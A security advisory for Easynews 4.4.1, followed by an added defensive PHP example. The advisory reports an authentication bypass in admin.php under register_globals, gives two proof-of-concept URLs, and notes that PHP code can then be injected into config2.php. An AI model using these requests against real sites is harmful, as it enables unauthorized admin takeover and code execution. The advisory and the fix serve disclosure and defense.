+-------------------------------------------------------------------------------------------
+ Easynews <= 4.4.1 (admin.php) Authentication Bypass Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: Easynews <= 4.4.1
+ Vendor ............: http://www.myupb.com/
+ Download ..........: http://fileserv.myupb.com/download.php?url=easynews4.4.1.zip
+ Description .......: "A news management system for your website."
+ Class .............: Authentication Bypass
+ Risk ..............: High (Authentication Bypass)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Easynews doesn't properly check that an administrator has logged in with a correct
+ username and password; it only checks if $admin[$en_login_id] == "true".
+
+ Tested and working on versions 4.4.0 and 4.4.1 (previous versions may also be affected)
+ with register_globals = On. After bypassing the login check, the administrator options
+ become available, including editing config2.php (PHP code can be inserted and then
+ executed by visiting config2.php directly or any other script that includes config2.php)
+ and other general settings.
+
+ Vulnerable Code:
+ admin.php, line(s) 22: if(@$admin[$en_login_id] == "true") //admin is logged in successfuly
+
+ Proof Of Concept:
+ http://[target]/[path]/admin.php?action=users&en_login_id=0
+ http://[target]/[path]/admin.php?action=config&en_login_id=0
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-10-17]
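
The kind of login check the advisory says is missing, as an added example that is not from the advisory and is not Easynews code: login state is written to $_SESSION only after the password has been verified, and the gate reads nothing from request-derived globals such as $en_login_id. The function names, the session key admin_user and the in-memory credential store are assumptions; the two action names are taken from the URLs above.

```php
<?php
// Added example, not Easynews code. All names here are hypothetical.
// register_globals was removed in PHP 5.4; on older installs set it to Off,
// since it turns every request parameter into a global variable.

// Constructed sample credential store: username => password_hash() output.
function load_admins(): array
{
    return ['editor' => password_hash('constructed-sample-password', PASSWORD_DEFAULT)];
}

// Called only by the login form handler, with values read from $_POST.
function login(string $user, string $password): bool
{
    $admins = load_admins();
    if (!isset($admins[$user]) || !password_verify($password, $admins[$user])) {
        return false;
    }
    session_regenerate_id(true);      // fresh session id once privileges change
    $_SESSION['admin_user'] = $user;  // state is stored server-side only
    return true;
}

// Gate placed at the top of every admin action. It trusts $_SESSION alone,
// never a global whose name or index can arrive in the query string.
function require_admin(): string
{
    $user = $_SESSION['admin_user'] ?? null;
    if (!is_string($user) || !array_key_exists($user, load_admins())) {
        http_response_code(403);
        exit('Login required');
    }
    return $user;
}

session_start(['cookie_httponly' => true, 'cookie_samesite' => 'Strict']);
$adminUser = require_admin();

// Read the action explicitly from $_GET and match it against an allow-list
// with a strict (type-safe) comparison.
$action = $_GET['action'] ?? '';
if (!in_array($action, ['users', 'config'], true)) {
    http_response_code(400);
    exit('Unknown action');
}
```

Without a prior successful login() in the same session, a request to this script ends at the 403 response regardless of which query parameters it carries.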